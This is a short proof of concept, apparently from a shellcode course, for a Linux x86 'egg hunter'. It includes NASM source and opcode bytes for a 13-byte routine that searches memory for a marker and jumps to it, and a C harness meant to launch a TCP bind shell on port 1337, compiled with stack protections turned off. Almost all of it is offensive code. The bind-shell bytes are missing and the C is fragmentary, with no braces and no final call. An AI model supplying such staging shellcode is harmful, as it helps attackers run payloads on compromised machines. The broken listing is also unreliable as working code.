* Title: Egg Hunter PoC
* Platform: linux/x86
* Date: 2015-01-07
* Author: Dennis 'dhn' Herrmann
* Website: https://zer0-day.pw
* Github: https://github.com/dhn/SLAE/
* SLAE-721
* egg_hunter.nasm
* ---------------
* BITS 32
* global _start
* section .text
* EGG_SIG equ 0x4f904790 ; signature
* _start:
* cdq ; zero out edx
* mov edx, EGG_SIG ; edx = 0x4f904790
* search_the_egg:
* inc eax ; increment eax
* cmp DWORD [eax], edx ; compare eax with the EGG_SIG
* jne search_the_egg ; if not compare jump to search_the_egg
* jmp eax ; jump to eax
#include <stdio.h>
#include <string.h>
* Egg Signature:
* 0x4f 0x90 0x47 0x90
* | | | |
* dec edi - NOP - inc edi - NOP
#define EGG_SIG "\x90\x47\x90\x4f"
unsigned char egg_hunter[] = \
"\x99" /* cdq */
"\xba\x90\x47\x90\x4f" /* mov edx, 0x4f904790 */
"\x40" /* inc eax */
"\x39\x10" /* cmp DWORD PTR [eax], edx */
"\x75\xfb" /* jne 6 <search_the_egg> */
"\xff\xe0"; /* jmp eax */
* Bind Shell TCP shellcode - 96 byte
* bind to port: 1337
unsigned char shellcode[] = \
EGG_SIG /* Egg Signature */
* $ gcc -Wl,-z,execstack -fno-stack-protector PoC.c -o PoC
* [+] Egg Hunter Length: 13
* [+] Shellcode Length + 4 byte egg: 100
void main()
printf("[+] Egg Hunter Length: %d\n", strlen(egg_hunter));
printf("[+] Shellcode Length + 4 byte egg: %d\n", strlen(shellcode));
int (*ret)() = (int(*)())egg_hunter;